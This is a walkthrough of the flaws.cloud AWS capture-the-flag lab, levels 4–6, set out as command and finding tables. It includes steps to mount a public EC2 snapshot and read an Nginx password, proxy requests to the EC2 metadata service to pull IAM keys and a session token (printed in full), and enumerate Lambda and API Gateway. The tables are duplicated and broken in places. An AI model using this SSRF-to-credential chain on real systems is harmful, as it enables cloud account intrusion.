4.4. π export L4_VOLUME_ID=$(aws --profile $L4_USER ec2 create-volume --availability-zone $L4_AWS_AZ --region $AWS_REGION --snapshot-id $L4_SNAPSHOT_ID --query 'VolumeId' --output text) |
Mount Snapshot ID to Volume |
4.5. π aws --profile "$L4_USER" --region "$AWS_REGION" ec2 create-key-pair --key-name "$L4_KEY" --query 'KeyMaterial' --output text > "${}.pem" |
Create Key Pair |
4.6. π export L4_NEW_VM_ID=$(aws ec2 run-instances --profile "$L4_USER" --region "$AWS_REGION" --image-id "$L4_IMAGE" --instance-type "$L4_INSTANCE_TYPE" --key-name "$L4_KEY" --tag-specifications "ResourceType=instance,Tags=[{Key=Name,Value=${L4_VM_NAME}}]" --query 'Instances[0].InstanceId' --output text) |
Launch EC2 Instance & Get Instance Id |
| 4.8. π export L4_NEW_VM_IP =$(aws ec2 describe-instances --profile $L4_USER --filters "Name=tag:Name,Values=Flaws_L4_VM" "Name=instance-state-name,Values=running" --query 'Reservations[].Instances[?State.Code==`16`].PublicIpAddress' --output text)
| Get New EC2 Instance IP |
| 4.9. π aws ec2 attach-volume --profile $L4_USER --region $AWS_REGION --instance-id $L4_NEW_VM_ID --volume-id $L4_VOLUME_ID --device /dev/xvdf
| Attach Mounted Volume to VM |
| 4.10. π ssh -v -i ./"$L4_KEY.pem" $L4_VM_USER@$L4_VM_HOST
| ssh into VM |
| 4.11. π lsblk
| list Drives |
| 4.12. π sudo file -s /dev/xvdf1
| View Drive Information |
| 4.13. π sudo mount /dev/xvdf1 /mnt && cat /mnt/home/ubuntu/setupNginx.sh
| Mount Attached Drive & Print setupNginx File Attached Drive |
| 4.14. π export L5_URL=$(curl -u $L4_NGINX_USER:$L4_NGINX_PASSWORD -s $L4_SNAPSHOT_URL | grep -oP '<a href="\K[^"]+')
| Get Next Level URL |
4.15. π Flaws-Scripts/aws_cli_configure_L4Profile.sh |
Configure AWS CLI |
---|
|-------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------|
4. π Pin | Content |
---|---|
4.0. π Sensitive Data in EC2 Snapshots | Sensitive Nginx Credentials in EC2 Snapshot |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
4.1. π Level 4 URL | http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud |
4.2. π Level 4 EC2 Snapshot | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud |
4.3. π Level 4 Account ID | 975426262029 |
4.4. π Level 4 EC2 Snapshot ID | snap-0b49342abd1bdcb89 |
4.4. π Level 4 EC2 Volume ID | vol-0e68287fb059d731b |
4.5. π Level 4 EC2 Image ID | ami-0fcf52bcf5db7b003 |
4.6. π Level 4 EC2 Instance IP | 54.69.166.141 |
4.7. π Level 4 EC2 Instace ID | i-049e3a08a0f58536b |
4.8. π Level 4 Nginx Credentials | setupNginx.sh |
4.9. π Level 4 Nginx Username | flaws |
4.10. π Level 4 Nginx Password | nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M |
5.1. π Level 5 URL | http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/ |
- Full Update
sudo apt-get update -y && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y && sudo apt-get autoremove -y && sudo apt-get autoclean -y
- JQ
|-------------------------------------------------------------------------------------------|:----------------------------------------------------------------------|
5.0. π Command | Description |
---|---|
5.0. π EC2 Metadata 169.254.169.254 | Exposed IAM Credentials in Metadata |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
5.1. π Flaws-Scripts/aws_cli_configure_L4Profile.sh |
Configure AWS CLI |
5.2. π export L5_EC2_URL=4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud" |
Set EC2 URL Variable |
5.3. π export L5_EC2_PROXY=http://$L5_EC2_URL/proxy |
Set Proxy URL |
5.4. π export L5_EC2_METADATA_IP=$L5_EC2_PROXY/$EC2_METADATA_IP |
Get EC2 Metada Service |
5.5 π export L5_EC2_METADATA_URL=$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_METADATA_URL |
Get Metada URL |
5.6 π export L5_EC2_IAM_METADATA_URL=$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_METADATA_URL/$EC2_IAM_METADATA_URL |
Get IAM Metada URL |
5.7 π export L5_METADATA=$(curl -s "$L5_EC2_METADATA_URL") |
Get IAM Role Name |
5.8 π export L5_USER=$(curl -s "$L5_EC2_IAM_METADATA_URL") |
Get IAM Role Name |
5.9 π export L5_USER_METADATA=$(curl -s "$L5_EC2_IAM_METADATA_URL/$L5_USER") |
Get IAM Metadata Credentials |
5.10. π `export L5_ACCESS_KEY=$(curl -s "$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_IAM_METADATA_URL/$L5_USER" | jq -r '.AccessKeyId)'` |
5.11. π `export L5_SECRET_KEY=$(curl -s "$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_IAM_METADATA_URL/$L5_USER" | jq -r '.SecretAccessKey')` |
5.12. π `export L5_TOKEN=$(curl -s "$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_IAM_METADATA_URL/$L5_USER" | jq -r '.Token')` |
5.13. π Flaws-Scripts/aws_cli_configure_L5Profile.sh |
Configure AWS CLI |
5.14. π aws s3 ls --profile $L5_USER --region $AWS_REGION $L6_BUCKET_URL |
List Bucket Files |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
|-------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------|
5. π Pin | Content |
---|---|
5.0. π EC2 Metadata 169.254.169.254 | Exposed IAM Credentials in Metadata |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
5.1. π Level 5 URL | http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/ |
5.2. π EC2 Metadata Service IP | 169.254.169.254/ |
5.3. π EC2 Instance | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud |
5.4. π EC2 Metada URL | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/ |
5.5. π EC2 IAM Credentials Metada URL | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud |
5.6.1 π EC2 Instance Proxy 1 | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/latest/meta-data/iam/security-credentials/ |
5.6.2 π EC2 Instance Proxy 2 | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/summitroute.com/blog/feed.xml |
5.6.3 π EC2 Instance Proxy 3 | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/ |
5.7.1. π EC2 IAM USER | flaws |
5.7.2. π fLaws Access Key | ASIA6GG7PSQGZVHCOSFP |
5.7.3. π flaws Secret Key | wzAV+fRr2b0/1IdWA5fsFE1HZ9vGMaJCQ2nAuRI+ |
5.7.4. π flaws Session Token | IQoJb3JpZ2luX2VjENT//////////wEaCXVzLXdlc3QtMiJHMEUCICysxf8e25Ao5/bX7HA0OElp5/RnrV8zMCrJwuCup0+VAiEAmc1uLD5e9NbT1px9rBJZEZnWVETMbu6Cn3ZinbkJ6qcquwUIvf//////////ARADGgw5NzU0MjYyNjIwMjkiDGIiCNBVyz80c8UvFCqPBToN3XQ1BlpYWcvCHVp9s9FlhdQZSCz2TGpnbH6i9lDNH+CH0iI3+eq6/GCrQFMN2YtFv4c4joUbFbmvbxv3p4UuG1FeO3bunakS3DzqSBEF2vMNWNKiwRvOOMHstHXBkPDuK2ciHAVzAQ3JaUZEskTq7TXe4gb/i+Epkx0T3NFnX805JflQKqA6YIdHHcR71PdKKvmFxAOhFLZhdvyKYrlf76xxGjirHjXJmNiA8p/PU8ZzsOYTV0Y6kxMVHJGqwVvH4Cng+iBtL+WfponpZRMgHcBvLw0a2mMrX20BjmI7ifJAfZ9bjX90FnFvqccnnEhYjycEbty+mRtLFmDPo0KM2mbgcQWxp+s1uwzAZTI8Ft4xY6UpHDmAF/6kAU1TNUJuuOz1NtAyxwPly6+k5GaayFumsRW4VbUucLTfeQGOBUlwJAtcT2DUg5kMT9QxNz+RAFpch0f0UCGie2LOlYtg5CIbnN1IxgYjNDcp9MPqYGvVB/g5VnIxZQNHjYE65Q4ScYxwV7UIgqHcG9ZHdjRxEc/jivLvrbcqidUpoxwv55YWTpkvENLgxpQPgX98n1Kmv1ycXYVkfbTvfnPqoWz9QKIITbF+inM+oVE2IT/7jQXnnU3USLHV1DUjOxMeYZ+1BzgwQB6nZYUtvMnESVa5R0iI7r+gPOIeNcVFL3HgeD6ZuN0ZGHzDO7TvuNo4R9D+5pUQ8F4jjkZA5ynmCGkwplOlPY0EeYjl4wnAOBhjvrX20MbbPwZ6yXevi5RlkpFWr5Yennp0cXCNxUsf7Nu5EAaYFgD+PpaGRrHBkgGg9GfGQlrUE13bKVLmJsAQOuokwf9aMGc6yj9YlB5SVsjratoon+e9It1/jwb33jMwqrraoQY6sQGUxpVr3JxA1UBSG3lCGGI5seaaSLOlnTT4G03cpBaCd2RxxISOlv3LtXs5bsLCzR2+eHUeulhCn9mH/Q/SDm5ysm7ztt4DJVzqZy+2CZ+yH9aXzOHOmHhQisOboLdj9V3NMQ/9P8ZKeWpVyQSTcEaK3kJ9mkbP7NJSWOnnW1S7r0kSyq2p8v0My/6ge4gtxeZTkzws4nRcS3XIlzoqlDxHGnwDzz/op65TdyGre0bPiQ8= |
6.0 π Level 6 URL | L6_URL=http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/ |
- Full Update
sudo apt-get update -y && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y && sudo apt-get autoremove -y && sudo apt-get autoclean -y
- JQ
- AWS CLI installed
- AWS CLI Profile configured
- AdministratorAccess Policy Attached to L4Profile
|-------------------------------------------------------------------------------------------|:----------------------------------------------------------------------|
6. π Command | Description |
---|---|
6.0. π Level 6 Title | Level 6 Description |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
6.1 π | |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
6.1. π ./Flaws-Scripts/aws_cli_configure_L6Profile.sh |
Configure AWS CLI |
6.2. π aws iam get-user --profile $L6_USER --region $AWS_REGION |
Get IAM User Info |
6.3. π `export L6_IAM_USER_POLICIES=$(aws iam list-attached-user-policies --user-name "$L6_IAM_USER" --profile "$L6_USER" --region "$AWS_REGION" --query 'AttachedPolicies[].PolicyArn' --output text | tr '\t' '\n' |
6.4. π Flaws-Scripts/aws_iam_full_policies |
Get IAM User Attached Policies Full Output |
6.5. π export L6_ACCOUNT_ID=$(aws --region $AWS_REGION --profile $L6_USER sts get-caller-identity --query 'Account' --output text) |
Get Level 6 Account ID |
6.6. π `export L6_EC2_LAMBDA_FUNCTION=$(aws --region $AWS_REGION --profile $L6_USER lambda list-functions --query 'Functions[].FunctionName' --output text | tr '[:upper:]' '[:lower:]')` |
6.7. π `export L6_EC2_LAMBDA_POLICY=$(aws --region $AWS_REGION --profile $L6_USER lambda list-functions --query 'Functions[].FunctionName' --output text | tr '\t' '\n' |
6.8. π `export L6_EC2_LAMBDA_ARN_STR=$(aws --region $AWS_REGION --profile $L6_USER lambda list-functions --query 'Functions[].FunctionName' --output text | tr '\t' '\n' |
6.9. π `export L6_EC2_LAMBDA_API=$(echo "$L6_EC2_LAMBDA_ARN_STR" | cut -d ':' -f 6 |
6.10. π export L6_EC2_LAMBDA_STAGE=$(aws --region $AWS_REGION --profile $L6_USER apigateway get-stages --rest-api-id $L6_EC2_LAMBDA_API --query 'item[0].stageName' --output text) |
Get EC2 Lambda Function Stage |
6.11. π `export L6_EC2_LAMBDA_SERVICE=$(aws --region $AWS_REGION --profile $L6_USER lambda list-functions --query 'Functions[].FunctionName' --output text | tr '\t' '\n' |
6.12. π `export L6_EC2_LAMBDA_FUNC_DOMAIN=$(echo "$L6_EC2_LAMBDA_ARN_STR" | grep -oP 'arn:aws:\K\w+-\w+')` |
6.13. π export L6_LAMBDA_FINAL_URL="https://$L6_EC2_LAMBDA_API.$L6_EC2_LAMBDA_FUNC_DOMAIN.$AWS_REGION.amazonaws.com/$L6_EC2_LAMBDA_STAGE/$L6_EC2_LAMBDA_FUNCTION" |
Get EC2 Lambda Function Final URL |
6.14. π `export L6_FINAL_URL=$(curl -s -X GET "$L6_LAMBDA_FINAL_URL" | grep -oP 'http[s]?://\S+')` |
6.14. π `export L6_FINAL_URL=$(curl -s -X GET "$L6_LAMBDA_FINAL_URL" | grep -oP 'http[s]?://\S+')` |
|-------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------|
6. π Pin | Content |
---|---|
6.0. π Pin | Content |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
6.1. π Level 6 Account Id | 975426262029 |
6.2. π IAM Policies | MySecurityAudit:v1, list_apigateaways:v4 |
6.3. π Lambda Function | level5 |
6.4. π Lambda Policy | Allow lambda:InvokeFunction using apigateway.amazonaws.com |
6.5. π Lambda Arn | arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6 |
6.6. π Lambda Final URL | https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6 |
6.7. π Final Level 6 URL | http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/" |